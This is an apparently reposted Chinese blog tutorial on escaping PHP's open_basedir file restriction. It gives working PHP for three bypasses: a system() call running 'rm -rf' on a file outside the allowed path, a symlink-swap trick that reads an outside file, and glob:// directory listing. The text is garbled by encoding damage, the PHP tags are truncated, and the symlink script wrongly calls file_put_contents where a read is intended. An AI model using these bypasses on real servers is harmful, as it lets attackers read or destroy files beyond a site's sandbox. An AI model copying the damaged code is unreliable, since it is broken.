0x00 預備知識
關(guān)于open_basedir
open_basedir是php.ini中的一個配置選項
它可將用戶訪問文件的活動范圍限制在指定的區(qū)域,
假設open_basedir=/home/wwwroot/home/web1/:/tmp/�����,那么通過web1訪問服務器的用戶就無法獲取服務器上除了/home/wwwroot/home/web1/和/tmp/這兩個目錄以外的文件���。
注意用open_basedir指定的限制實際上是前綴,而不是目錄名�����。
舉例來說: 若"open_basedir = /dir/user", 那么目錄 "/dir/user" 和 "/dir/user1"都是可以訪問的��。所以如果要將訪問限制在僅為指定的目錄�,請用斜線結(jié)束路徑名。
關(guān)于符號鏈接
符號鏈接又叫軟鏈接,是一類特殊的文件���,這個文件包含了另一個文件的路徑名(絕對路徑或者相對路徑)����。
路徑可以是任意文件或目錄�����,可以鏈接不同文件系統(tǒng)的文件���。在對符號文件進行讀或?qū)懖僮鞯臅r候�,系統(tǒng)會自動把該操作轉(zhuǎn)換為對源文件的操作�,但刪除鏈接文件時�����,系統(tǒng)僅僅刪除鏈接文件,而不刪除源文件本身�����。
0x01 命令執(zhí)行函數(shù)
由于open_basedir的設置對system等命令執(zhí)行函數(shù)是無效的���,所以我們可以使用命令執(zhí)行函數(shù)來訪問限制目錄����。
我們首先創(chuàng)建一個目錄
/home/puret/test/
且在該目錄下新建一個1.txt 內(nèi)容為abc
nano 1.txt
再在該目錄下創(chuàng)建一個目錄命名為b
mkdir b
并且在該目錄下創(chuàng)建一個1.php文件內(nèi)容為
?php
echo file_get_contents("../1.txt");
?>
且在php.ini中設置好我們的open_basedir
open_basedir = /home/puret/test/b/
我們嘗試執(zhí)行1.php看看open_basedir是否會限制我們的訪問
執(zhí)行效果如圖
很明顯我們無法直接讀取open_basedir所規(guī)定以外的目錄文件���。
接下來我們用system函數(shù)嘗試繞open_basedir的限制來刪除1.txt
編輯1.php為
?php
system("rm -rf ../1.txt");
?>
先來看看執(zhí)行1.php之前的文件情況
執(zhí)行1.php之后
成功通過命令執(zhí)行函數(shù)繞過open_basedir來刪除文件�。
由于命令執(zhí)行函數(shù)一般都會被限制在disable_function當中���,所以我們需要尋找其他的途徑來繞過限制����。
0x02 symlink()函數(shù)
我們先來了解一下symlink函數(shù)
bool symlink ( string $target , string $link )
symlink函數(shù)將建立一個指向target的名為link的符號鏈接���,當然一般情況下這個target是受限于open_basedir的��。
由于早期的symlink不支持windows���,我的測試環(huán)境就放在Linux下了����。
測試的PHP版本是5.3.0�����,其他的版本大家自測吧����。
在Linux環(huán)境下我們可以通過symlink完成一些邏輯上的繞過導致可以跨目錄操作文件。
我們首先在/var/www/html/1.php中 編輯1.php的內(nèi)容為
?php
mkdir("c");
chdir("c");
mkdir("d");
chdir("d");
chdir("..");
chdir("..");
symlink("c/d","tmplink");
symlink("tmplink/../../1.txt","exploit");
unlink("tmplink");
mkdir("tmplink");
echo file_put_contents("http://127.0.0.1/exploit");
?>
接著在/var/www/中新建一個1.txt文件內(nèi)容為
"abc"
再來設置一下我們的open_basedir
open_basedir = /var/www/html/
在html目錄下編輯一個php腳本檢驗一下open_basedir
?php
file_get_contents("../1.txt");
?>
執(zhí)行看下���。
意料之中�,文件無法訪問��。
我們執(zhí)行剛才寫好的腳本����,1.php
可以看到成功讀取到了1.txt的文件內(nèi)容,逃脫了open_basedir的限制
問題的關(guān)鍵就在于
symlink("tmplink/../../1.txt","exploit");
此時tmplink還是一個符號鏈接文件�,它指向的路徑是c/d,因此exploit指向的路徑就變成了
c/d/../../1.txt
由于這個路徑在open_basedir的范圍之內(nèi)所以exploit成功建立了�。
之后我們刪除tmplink符號鏈接文件再新建一個同名為tmplink的文件夾,這時exploit所指向的路徑為
tmplink/../../
由于這時候tmplink變成了一個真實存在的文件夾所以tmplink/../../變成了1.txt所在的目錄即/var/www/
然后再通過訪問符號鏈接文件exploit即可直接讀取到1.txt的文件內(nèi)容
當然����,針對symlink()只需要將它放入disable_function即可解決問題,所以我們需要尋求更多的方法����。
0x03 glob偽協(xié)議
glob是php自5.3.0版本起開始生效的一個用來篩選目錄的偽協(xié)議,由于它在篩選目錄時是不受open_basedir的制約的�����,所以我們可以利用它來繞過限制����,我們新建一個目錄在/var/www/下命名為test
并且在/var/www/html/下新建t.php內(nèi)容為
?php
$a = "glob:///var/www/test/*.txt";
if ( $b = opendir($a) ) {
while ( ($file = readdir($b)) !== false ) {
echo "filename:".$file."\n";
}
closedir($b);
}
?>
執(zhí)行結(jié)果如圖:
成功躲過open_basedir的限制讀取到了文件。
您可能感興趣的文章:- php利用ZipArchive類操作文件的實例
- PHP操作文件的一些基本函數(shù)使用示例
- PHP操作文件類的函數(shù)代碼(文件和文件夾創(chuàng)建��,復制���,移動和刪除)
- PHP 操作文件的一些FAQ總結(jié)
- PHP操作文件方法問答
- 在PHP中操作文件的擴展屬性
